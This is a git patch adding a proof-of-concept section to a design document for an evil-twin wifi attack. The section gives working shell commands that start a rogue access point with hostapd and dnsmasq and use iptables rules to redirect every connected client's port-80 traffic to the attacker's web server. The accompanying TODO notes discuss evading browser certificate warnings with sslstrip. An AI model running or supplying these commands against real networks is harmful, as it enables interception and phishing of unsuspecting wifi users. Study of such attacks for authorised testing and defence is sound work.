From 830e3794feddf0de37fa309d434656f29e58a7f3 Mon Sep 17 00:00:00 2001 From: derv82 Date: Tue, 17 Apr 2018 14:15:34 -0400 Subject: [PATCH] Added "proof-of-concept" commands to start AP & redirect traffic --- EVILTWIN.md | 50 ++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 50 insertions(+) diff --git a/EVILTWIN.md b/EVILTWIN.md index 8fdb109..0d6a6f5 100644 --- a/EVILTWIN.md +++ b/EVILTWIN.md @@ -147,6 +147,8 @@ TODO: * What about HTTPS traffic (port 443)? * We want to avoid browser warnings (scary in Chrome & Firefox). + * Don't think we can send a 302 redirect to port 80 without triggering the invalid certificate issue. + * sslstrip may get around this... DEAUTHING @@ -332,3 +334,51 @@ This deauthing should continue until all clients are deauthenticated from the Ev Then the script can be stopped. + +Proof of Concept +================ + +Start AP and capture all port-80 traffic: + +``` +ifconfig wlan0 10.0.0.1/24 up + +# start dnsmasq for dhcp & dns resolution (runs in background) +killall dnsmasq +dnsmasq -C dnsmasq.conf + +# reroute all port-80 traffic to our machine +iptables -N internet -t mangle +iptables -t mangle -A PREROUTING -j internet +iptables -t mangle -A internet -j MARK --set-mark 99 +iptables -t nat -A PREROUTING -m mark --mark 99 -p tcp --dport 80 -j DNAT --to-destination 10.0.0.1 +echo "1" > /proc/sys/net/ipv4/ip_forward +iptables -A FORWARD -i eth0 -o wlan0 -m state --state ESTABLISHED,RELATED -j ACCEPT +iptables -A FORWARD -m mark --mark 99 -j REJECT +iptables -A FORWARD -i wlan0 -o eth0 -j ACCEPT +iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE + +# start wifi access point (new terminal) +killall hostapd +hostapd ./hostapd.conf -i wlan0 + +# start webserver on port 80 (new terminal) +python -m SimpleHTTPServer 80 +``` + +Cleanup: + +``` +# stop processes +# ctrl+c hostapd +# ctrl+c python simple http server +killall dnsmasq + +# reset iptables +iptables -F +iptables -X +iptables -t nat -F +iptables -t nat -X +iptables -t mangle -F +iptables -t mangle -X +```